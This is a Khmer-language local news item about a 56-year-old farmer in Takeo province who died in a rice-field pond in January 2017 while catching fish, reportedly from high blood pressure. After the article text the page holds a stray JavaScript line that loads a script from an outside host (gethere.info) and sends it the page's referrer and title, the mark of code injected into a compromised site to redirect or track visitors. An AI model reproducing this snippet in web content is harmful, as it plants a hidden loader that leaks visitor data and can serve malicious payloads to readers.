អនិច្ចាណាស់លោកអើយ ហេតុតែក្រ ខំយកឈ្នាងទៅជញ្ជាត់ត្រី យកមកហូប តែព្រហ្មលិខិតមិនប្រណី បែរជាលង់ទឹកស្លាប់

11 ខែ មុន 0 តូ សុផល

តាកែវ៖ ស្ត្រីម្នាក់បានចេញពីផ្ទះទៅរកជញ្ជាត់ត្រី ក្បែរបៀដោយក្នុងដៃមានយកទៅជាមួយដូចជា(ឈ្នាង.ចានដែក.កញ្រែងជ័រ) ដើម្បីជញ្ជាត់ត្រី ដែលមានចំងាយពីប្រមាណជា៣៥០មែត្រពីផ្ទះតែជាអកុសល មិនទាន់រកបានត្រីផង គាត់ក៍បានប្រកាច់ស្លាប់នៅក្នុងទឹកស្រែ ដោយសារតែជំងឺប្រចាំកាយ(លើសឈាម)។ហេតុការណ៍នេះបង្កឲ្យមានការភ្ញាល់ផ្អើលកើតឡើងទាំងព្រឹក ថ្ងៃទី១២ខែមករា ឆ្នាំ២០១៧ វេលាម៉ោង៨នឹង៣០នាទី ស្ថិតនៅក្នុងភូមិត្រពាំងវែង ឃុំប្រាំបីមុំ ស្រុកទ្រាំង ខេត្តតាកែវ។សពជនរងគ្រោះត្រូវបានគេស្គាល់ឈ្មោះថាម៉ៅ សៀន ភេទស្រី អាយុ៥៦ឆ្នាំ មុខរបរធ្វើស្រែ រស់នៅភូមិឃុំខាងលើ។ក្រោយពេលកើតហេតុសមត្ថកិច្ចបានចុះទៅដល់ធ្វើការត្រួតពិនិត្យរួចឃើញថាសពជនរងគ្រោះពិតជាបានស្លាប់ដោយសារជំងឺប្រចាំកាយ(លើសឈាម)ពិតប្រាកដ៍មែន ក៌បានប្រគល់សាកសពយកក្រុមគ្រួសារសែងយកមកផ្ទះធ្វើបុុណ្យតាមប្រពៃណី។(សុខន)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

%d bloggers like this: